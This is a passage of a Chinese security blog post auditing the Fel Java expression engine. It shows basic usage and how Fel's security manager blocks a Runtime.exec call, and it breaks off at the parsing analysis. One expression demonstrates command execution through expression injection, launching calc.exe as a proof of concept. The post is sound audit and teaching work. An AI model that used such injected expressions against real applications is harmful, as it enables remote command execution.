<!DOCTYPE html>
<html lang=zh>
<head>
  <meta charset="utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  <!-- Color theme for statusbar -->
  <meta name="theme-color" content="#000000" />
  <!-- 强制页面在当前窗口以独立页面显示,防止别人在框架里调用页面 -->
  <meta http-equiv="window-target" content="_top" />
  
  
  <title>Fel代码审计 | 无名大仙</title>
  <meta name="description" content="Fel  Fel介绍   Fel：Fast Expression Language，是一种开源表达式引擎，基于java1.5开发，适用java1.5及以上版本。   特点：如名所示：fast—快，每秒可执行千万次表达式，速度是Jexl-2.0的20倍以上。   下载地址：https:&#x2F;&#x2F;code.google.com&#x2F;archive&#x2F;p&#x2F;fast-el&#x2F;downloads   Maven导入 1">
<meta property="og:type" content="article">
<meta property="og:title" content="Fel代码审计">
<meta property="og:url" content="https://vvmdx.github.io/2021/08/11/2021-08-11-Fel%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="Fel  Fel介绍   Fel：Fast Expression Language，是一种开源表达式引擎，基于java1.5开发，适用java1.5及以上版本。   特点：如名所示：fast—快，每秒可执行千万次表达式，速度是Jexl-2.0的20倍以上。   下载地址：https:&#x2F;&#x2F;code.google.com&#x2F;archive&#x2F;p&#x2F;fast-el&#x2F;downloads   Maven导入 1">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://vvmdx.github.io/images/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Fel/image1.png">
<meta property="og:image" content="https://vvmdx.github.io/images/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Fel/image2.png">
<meta property="og:image" content="https://vvmdx.github.io/images/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Fel/image3.png">
<meta property="og:image" content="https://vvmdx.github.io/images/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Fel/image4.png">
<meta property="article:published_time" content="2021-08-10T16:00:00.000Z">
<meta property="article:modified_time" content="2021-08-11T02:43:14.585Z">
<meta property="article:author" content="vvmdx">
<meta property="article:tag" content="java表达式引擎">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://vvmdx.github.io/images/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Fel/image1.png">
  <!-- Canonical links -->
  <link rel="canonical" href="https://vvmdx.github.io/2021/08/11/2021-08-11-Fel%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/index.html">
  
  
    <link rel="icon" href="/favicon.png" type="image/x-icon">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  
  
  
<meta name="generator" content="Hexo 5.4.0"></head>


<body class="main-center theme-black" itemscope itemtype="http://schema.org/WebPage">
  <header class="header" itemscope itemtype="http://schema.org/WPHeader">
  <div class="slimContent">
    <div class="navbar-header">
      
      
      <div class="profile-block text-center">
        <a id="avatar" href="https://github.com/vvmdx/vvmdx.github.io" target="_blank">
          <img class="img-circle img-rotate" src="/images/avatar.jpg" width="200" height="200">
        </a>
        <h2 id="name" class="hidden-xs hidden-sm">无名大仙</h2>
        <h3 id="title" class="hidden-xs hidden-sm hidden-md">学习记录 &amp; 笔记分享</h3>
        <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i> Guangzhou, China</small>
      </div>
      
      <div class="search" id="search-form-wrap">

    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="搜索" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i class="icon icon-search"></i></button>
            </span>
        </div>
    </form>
    <div class="ins-search">
  <div class="ins-search-mask"></div>
  <div class="ins-search-container">
    <div class="ins-input-wrapper">
      <input type="text" class="ins-search-input" placeholder="想要查找什么..." x-webkit-speech />
      <button type="button" class="close ins-close ins-selectable" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
    </div>
    <div class="ins-section-wrapper">
      <div class="ins-section-container"></div>
    </div>
  </div>
</div>


</div>
      <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
    </div>
    <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
      <ul class="nav navbar-nav main-nav menu-highlight">
        
        
        <li class="menu-item menu-item-home">
          <a href="/.">
            
            <i class="icon icon-home-fill"></i>
            
            <span class="menu-title">首页</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives">
            
            <i class="icon icon-archives-fill"></i>
            
            <span class="menu-title">归档</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-categories">
          <a href="/categories">
            
            <i class="icon icon-folder"></i>
            
            <span class="menu-title">分类</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-tags">
          <a href="/tags">
            
            <i class="icon icon-tags"></i>
            
            <span class="menu-title">标签</span>
          </a>
        </li>
        
      </ul>
      
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/vvmdx/vvmdx.github.io" target="_blank" title="Github" ><i class="icon icon-github"></i></a></li>
        
    </ul>

    </nav>
  </div>
</header>

  
    <aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">公告</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content">
                <p>新手一个直接用的别人的主题，许多功能不齐全又乱七八糟的东西见笑了</p>
            </div>
        </div>
    </div>
</div>

    
      
  <div class="widget">
    <h3 class="widget-title">分类</h3>
    <div class="widget-body">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/PWN/">PWN</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">java代码审计</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%AD%A6%E7%82%B9%E4%B8%9C%E8%A5%BF/">学点东西</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%89%BE%E5%B7%A5%E4%BD%9C/">找工作</a><span class="category-list-count">4</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">标签</h3>
    <div class="widget-body">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag">java反序列化</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/java%E8%A1%A8%E8%BE%BE%E5%BC%8F%E5%BC%95%E6%93%8E/" rel="tag">java表达式引擎</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8D%9A%E5%AE%A2/" rel="tag">博客</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%95%99%E5%AD%A6-%E6%80%9D%E8%B7%AF-%E8%BF%87%E7%A8%8B/" rel="tag">教学&思路&过程</a><span class="tag-list-count">3</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%8E%AF%E5%A2%83-%E5%B7%A5%E5%85%B7/" rel="tag">环境&工具</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%9D%A2%E8%AF%95%E5%A4%8D%E7%9B%98/" rel="tag">面试复盘</a><span class="tag-list-count">4</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">标签云</h3>
    <div class="widget-body tagcloud">
      <a href="/tags/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" style="font-size: 13px;">java反序列化</a> <a href="/tags/java%E8%A1%A8%E8%BE%BE%E5%BC%8F%E5%BC%95%E6%93%8E/" style="font-size: 13px;">java表达式引擎</a> <a href="/tags/%E5%8D%9A%E5%AE%A2/" style="font-size: 13px;">博客</a> <a href="/tags/%E6%95%99%E5%AD%A6-%E6%80%9D%E8%B7%AF-%E8%BF%87%E7%A8%8B/" style="font-size: 13.5px;">教学&思路&过程</a> <a href="/tags/%E7%8E%AF%E5%A2%83-%E5%B7%A5%E5%85%B7/" style="font-size: 13px;">环境&工具</a> <a href="/tags/%E9%9D%A2%E8%AF%95%E5%A4%8D%E7%9B%98/" style="font-size: 14px;">面试复盘</a>
    </div>
  </div>

    
      
  <div class="widget">
    <h3 class="widget-title">归档</h3>
    <div class="widget-body">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/08/">八月 2021</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/06/">六月 2021</a><span class="archive-list-count">4</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/05/">五月 2021</a><span class="archive-list-count">4</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget-body">
      <ul class="recent-post-list list-unstyled no-thumbnail">
        
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/PWN/">PWN</a>
              </p>
              <p class="item-title">
                <a href="/2021/08/16/2021-08-16-Shellcode%E5%9F%BA%E7%A1%80/" class="title">Shellcode基础</a>
              </p>
              <p class="item-date">
                <time datetime="2021-08-15T16:00:00.000Z" itemprop="datePublished">2021-08-16</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">java代码审计</a>
              </p>
              <p class="item-title">
                <a href="/2021/08/13/2021-08-13-java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%9F%BA%E7%A1%80/" class="title">java反序列化基础</a>
              </p>
              <p class="item-date">
                <time datetime="2021-08-12T16:00:00.000Z" itemprop="datePublished">2021-08-13</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">java代码审计</a>
              </p>
              <p class="item-title">
                <a href="/2021/08/11/2021-08-11-Fel%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" class="title">Fel代码审计</a>
              </p>
              <p class="item-date">
                <time datetime="2021-08-10T16:00:00.000Z" itemprop="datePublished">2021-08-11</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/PWN/">PWN</a>
              </p>
              <p class="item-title">
                <a href="/2021/06/18/2021-06-18-CISCN_2019_s_9/" class="title">CISCN_2019_s_9</a>
              </p>
              <p class="item-date">
                <time datetime="2021-06-17T16:00:00.000Z" itemprop="datePublished">2021-06-18</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/PWN/">PWN</a>
              </p>
              <p class="item-title">
                <a href="/2021/06/14/2021-06-14-mrctf2020_shellcode/" class="title">mrctf2020_shellcode</a>
              </p>
              <p class="item-date">
                <time datetime="2021-06-13T16:00:00.000Z" itemprop="datePublished">2021-06-14</time>
              </p>
            </div>
          </li>
          
      </ul>
    </div>
  </div>
  

    
  </div>
</aside>

  
  
<aside class="sidebar sidebar-toc collapse" id="collapseToc" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    <nav id="toc" class="article-toc">
      <h3 class="toc-title">文章目录</h3>
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#fel"><span class="toc-number">1.</span> <span class="toc-text"> Fel</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#fel%E4%BB%8B%E7%BB%8D"><span class="toc-number">1.1.</span> <span class="toc-text"> Fel介绍</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8%E6%96%B9%E6%B3%95"><span class="toc-number">1.2.</span> <span class="toc-text"> 使用方法</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9F%BA%E6%9C%AC%E7%AE%97%E6%9C%AF%E8%A1%A8%E8%BE%BE%E5%BC%8F%E8%AE%A1%E7%AE%97"><span class="toc-number">1.2.1.</span> <span class="toc-text"> 基本算术表达式计算</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8%E5%8F%98%E9%87%8F%E8%B0%83%E7%94%A8java%E6%96%B9%E6%B3%95"><span class="toc-number">1.2.2.</span> <span class="toc-text"> 使用变量&#x2F;调用java方法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%87%AA%E5%AE%9A%E4%B9%89%E4%B8%8A%E4%B8%8B%E6%96%87%E5%B8%B8%E8%A7%81%E7%94%A8%E6%B3%95"><span class="toc-number">1.2.3.</span> <span class="toc-text"> 自定义上下文&#x2F;常见用法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%B0%83%E7%94%A8%E9%9D%99%E6%80%81%E6%96%B9%E6%B3%95"><span class="toc-number">1.2.4.</span> <span class="toc-text"> 调用静态方法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E5%99%A8"><span class="toc-number">1.2.5.</span> <span class="toc-text"> 安全管理器</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A1%A8%E8%BE%BE%E5%BC%8F%E8%A7%A3%E6%9E%90"><span class="toc-number">1.3.</span> <span class="toc-text"> 表达式解析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AF%AD%E6%B3%95%E6%A0%91%E7%BB%93%E6%9E%84"><span class="toc-number">1.3.1.</span> <span class="toc-text"> 语法树结构</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%A7%E8%A1%8C%E8%A1%A8%E8%BE%BE%E5%BC%8F"><span class="toc-number">1.3.2.</span> <span class="toc-text"> 执行表达式</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96class%E5%88%9B%E5%BB%BA%E5%AF%B9%E8%B1%A1"><span class="toc-number">1.3.3.</span> <span class="toc-text"> 获取class&#x2F;创建对象</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%96%B9%E6%B3%95"><span class="toc-number">1.3.4.</span> <span class="toc-text"> 获取方法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E5%99%A8-2"><span class="toc-number">1.3.5.</span> <span class="toc-text"> 安全管理器</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%89%A7%E8%A1%8C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4"><span class="toc-number">1.4.</span> <span class="toc-text"> 执行系统命令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#processbuilder"><span class="toc-number">1.4.1.</span> <span class="toc-text"> ProcessBuilder</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96class"><span class="toc-number">1.4.1.1.</span> <span class="toc-text"> 获取class</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%9B%E5%BB%BA%E5%AF%B9%E8%B1%A1"><span class="toc-number">1.4.1.2.</span> <span class="toc-text"> 创建对象</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%8B%93%E5%B1%95"><span class="toc-number">1.4.1.3.</span> <span class="toc-text"> 拓展</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#runtime"><span class="toc-number">1.4.2.</span> <span class="toc-text"> Runtime</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%9B%E5%BB%BA%E6%81%B6%E6%84%8F%E7%B1%BB"><span class="toc-number">1.4.3.</span> <span class="toc-text"> 创建恶意类</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A5%97%E5%A8%83"><span class="toc-number">1.4.4.</span> <span class="toc-text"> 套娃</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%98%B2%E5%BE%A1"><span class="toc-number">1.5.</span> <span class="toc-text"> 防御</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%8E%E8%AE%B0%E6%80%BB%E7%BB%93"><span class="toc-number">1.6.</span> <span class="toc-text"> 后记&#x2F;总结</span></a></li></ol></li></ol>
    </nav>
  </div>
</aside>

<main class="main" role="main">
  <div class="content">
  <article id="post-2021-08-11-Fel代码审计" class="article article-type-post" itemscope itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      
        
  
    <h1 class="article-title" itemprop="name">
      Fel代码审计
    </h1>
  

      
      <div class="article-meta">
        <span class="article-date">
    <i class="icon icon-calendar-check"></i>
	<a href="/2021/08/11/2021-08-11-Fel%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" class="article-date">
	  <time datetime="2021-08-10T16:00:00.000Z" itemprop="datePublished">2021-08-11</time>
	</a>
</span>
        
  <span class="article-category">
    <i class="icon icon-folder"></i>
    <a class="article-category-link" href="/categories/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">java代码审计</a>
  </span>

        
  <span class="article-tag">
    <i class="icon icon-tags"></i>
	<a class="article-tag-link-link" href="/tags/java%E8%A1%A8%E8%BE%BE%E5%BC%8F%E5%BC%95%E6%93%8E/" rel="tag">java表达式引擎</a>
  </span>


        
	<span class="article-read hidden-xs">
	    <i class="icon icon-eye-fill" aria-hidden="true"></i>
	    <span id="busuanzi_container_page_pv">
			<span id="busuanzi_value_page_pv">0</span>
		</span>
	</span>


        <span class="post-comment"><i class="icon icon-comment"></i> <a href="/2021/08/11/2021-08-11-Fel%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/#comments" class="article-comment-link">评论</a></span>
        
	
		<span class="post-wordcount hidden-xs" itemprop="wordCount">字数统计: 3.4k(字)</span>
	
	
		<span class="post-readcount hidden-xs" itemprop="timeRequired">阅读时长: 15(分)</span>
	

      </div>
    </div>
    <div class="article-entry marked-body" itemprop="articleBody">
      
        <h1 id="fel"><a class="markdownIt-Anchor" href="#fel"></a> Fel</h1>
<h2 id="fel介绍"><a class="markdownIt-Anchor" href="#fel介绍"></a> Fel介绍</h2>
<ul>
<li>
<p><strong>Fel</strong>：Fast Expression Language，是一种开源表达式引擎，基于java1.5开发，适用java1.5及以上版本。</p>
</li>
<li>
<p><strong>特点</strong>：如名所示：fast—快，每秒可执行千万次表达式，速度是Jexl-2.0的20倍以上。</p>
</li>
<li>
<p><strong>下载地址</strong>：<a target="_blank" rel="noopener" href="https://code.google.com/archive/p/fast-el/downloads">https://code.google.com/archive/p/fast-el/downloads</a></p>
</li>
<li>
<p><strong>Maven导入</strong></p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>org.eweb4j<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>fel<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">version</span>&gt;</span>0.8<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
<h2 id="使用方法"><a class="markdownIt-Anchor" href="#使用方法"></a> 使用方法</h2>
<h3 id="基本算术表达式计算"><a class="markdownIt-Anchor" href="#基本算术表达式计算"></a> 基本算术表达式计算</h3>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">FelEngine felEngine = <span class="keyword">new</span> FelEngineImpl();</span><br><span class="line">Object result1 = felEngine.eval(<span class="string">&quot;(5*6+10)/4&quot;</span>);</span><br></pre></td></tr></table></figure>
<h3 id="使用变量调用java方法"><a class="markdownIt-Anchor" href="#使用变量调用java方法"></a> 使用变量/调用java方法</h3>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">FelEngine felEngine = <span class="keyword">new</span> FelEngineImpl();</span><br><span class="line">FelContext felContext = felEngine.getContext();</span><br><span class="line"><span class="comment">// 将System.out赋值给&quot;test&quot;</span></span><br><span class="line">felContext.set(<span class="string">&quot;test&quot;</span>, System.out);</span><br><span class="line"><span class="comment">// 起到执行System.out.println()的作用</span></span><br><span class="line">felEngine.eval(<span class="string">&quot;test.println(&#x27;Hello world&#x27;.substring(6))&quot;</span>);</span><br></pre></td></tr></table></figure>
<h3 id="自定义上下文常见用法"><a class="markdownIt-Anchor" href="#自定义上下文常见用法"></a> 自定义上下文/常见用法</h3>
<ul>
<li>自定义实体类</li>
</ul>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Student类</span></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Student</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">private</span> String name;</span><br><span class="line">    <span class="keyword">private</span> String id;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">int</span> age;</span><br><span class="line">    <span class="keyword">private</span> String sex;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="title">Student</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="title">Student</span><span class="params">(String name, String id, <span class="keyword">int</span> age, String sex)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">this</span>.name = name;</span><br><span class="line">        <span class="keyword">this</span>.id = id;</span><br><span class="line">        <span class="keyword">this</span>.age = age;</span><br><span class="line">        <span class="keyword">this</span>.sex = sex;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="function"><span class="keyword">public</span> String <span class="title">toString</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;Student&#123;&quot;</span> +</span><br><span class="line">                <span class="string">&quot;name=&#x27;&quot;</span> + name + <span class="string">&#x27;\&#x27;&#x27;</span> +</span><br><span class="line">                <span class="string">&quot;, id=&#x27;&quot;</span> + id + <span class="string">&#x27;\&#x27;&#x27;</span> +</span><br><span class="line">                <span class="string">&quot;, age=&quot;</span> + age +</span><br><span class="line">                <span class="string">&quot;, sex=&#x27;&quot;</span> + sex + <span class="string">&#x27;\&#x27;&#x27;</span> +</span><br><span class="line">                <span class="string">&#x27;&#125;&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<ul>
<li>Fel调用</li>
</ul>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 创建表达式引擎对象</span></span><br><span class="line">FelEngine felEngine = <span class="keyword">new</span> FelEngineImpl();</span><br><span class="line"><span class="comment">// 创建Context设值对象</span></span><br><span class="line">FelContext felContext = felEngine.getContext();</span><br><span class="line"><span class="comment">// 实例化Student对象</span></span><br><span class="line">Student student = <span class="keyword">new</span> Student(<span class="string">&quot;vvmdx&quot;</span>,<span class="string">&quot;13579&quot;</span>,<span class="number">23</span>,<span class="string">&quot;male&quot;</span>);</span><br><span class="line"><span class="comment">// Context对象设值，将student.toString()赋给stu变量</span></span><br><span class="line">felContext.set(<span class="string">&quot;stu&quot;</span>, student.toString());</span><br><span class="line"><span class="comment">// 执行表达式</span></span><br><span class="line">Object result = felEngine.eval(<span class="string">&quot;stu&quot;</span>);</span><br></pre></td></tr></table></figure>
<h3 id="调用静态方法"><a class="markdownIt-Anchor" href="#调用静态方法"></a> 调用静态方法</h3>
<ul>
<li>通过<code>$(‘class’).method</code>的语法可以调用第三方类包、工具类、自定义类的方法，也可以创建对象，调用对象的方法</li>
</ul>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 调用工具类</span></span><br><span class="line"><span class="comment">// 执行Math.min(1,2)</span></span><br><span class="line">FelEngine.instance.eval(<span class="string">&quot;$(&#x27;Math&#x27;).min(1,2)&quot;</span>);</span><br><span class="line"><span class="comment">// 调用第三方类</span></span><br><span class="line"><span class="comment">// 执行Runtime.getRuntime().exec(&quot;C:\\Windows\\System32\\calc.exe&quot;)</span></span><br><span class="line">FelEngine.instance.eval(<span class="string">&quot;$(&#x27;Runtime&#x27;).getRuntime().exec(\&quot;C:\\\\Windows\\\\System32\\\\calc.exe\&quot;)&quot;</span>);</span><br><span class="line"><span class="comment">// 调用自定义类</span></span><br><span class="line"><span class="comment">// 执行new Student().toString()</span></span><br><span class="line">FelEngine.instance.eval(<span class="string">&quot;$(&#x27;test.Student.new&#x27;).toString()&quot;</span>);</span><br></pre></td></tr></table></figure>
<h3 id="安全管理器"><a class="markdownIt-Anchor" href="#安全管理器"></a> 安全管理器</h3>
<ul>
<li>从0.8版本开始，为了防止<code>“$&#123;System&#125;.exit(1)$”</code>这样的表达式导致系统崩溃，Fel加入了安全管理器，对方法访问进行控制</li>
</ul>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 加入安全管理器后执行如下代码会抛出异常</span></span><br><span class="line">FelEngine.instance.eval(<span class="string">&quot;$(&#x27;Runtime&#x27;).getRuntime().exec(\&quot;C:\\\\Windows\\\\System32\\\\calc.exe\&quot;)&quot;</span>);</span><br><span class="line"><span class="comment">// 安全管理器[RegexSecurityMgr]禁止调用方法[public static java.lang.Runtime java.lang.Runtime.getRuntime()]</span></span><br></pre></td></tr></table></figure>
<h2 id="表达式解析"><a class="markdownIt-Anchor" href="#表达式解析"></a> 表达式解析</h2>
<ul>
<li>这里以<code>FelEngine.instance.eval(&quot;$('Runtime').getRuntime().exec(\&quot;C:\\\\Windows\\\\System32\\\\calc.exe\&quot;)&quot;);</code>为例，展示表达式解析的流程，以及安全管理器的过滤</li>
</ul>
<h3 id="语法树结构"><a class="markdownIt-Anchor" href="#语法树结构"></a> 语法树结构</h3>
<p><img src="/images/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Fel/image1.png" alt="image" /></p>
<ul>
<li>Fel表达式语法树有3种节点
<ul>
<li><strong>常量节点</strong>：<strong>ConstNode</strong>（包括类名、包名、方法内的固定参数等）</li>
<li><strong>函数节点</strong>：<strong>FunNode</strong>（包括 +、-、*、/、$、.等操作符或者getRuntime()、exec()等方法）</li>
<li><strong>变量节点</strong>：<strong>VarAstNode</strong>（若执行表达式<code>((a+b)*c/d)</code>，则其中a、b、c、d均为变量节点</li>
<li>以上节点都继承自<strong>AbstFelNode</strong>，所有组成表达式的元素都会被解析成节点</li>
</ul>
</li>
</ul>
<p><img src="/images/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Fel/image2.png" alt="image" /></p>
<h3 id="执行表达式"><a class="markdownIt-Anchor" href="#执行表达式"></a> 执行表达式</h3>
<ol>
<li><strong>解析表达式</strong>：默认Antlr解析表达式（antlr-min-3.4.jar），生成AbstNode组成的语法树</li>
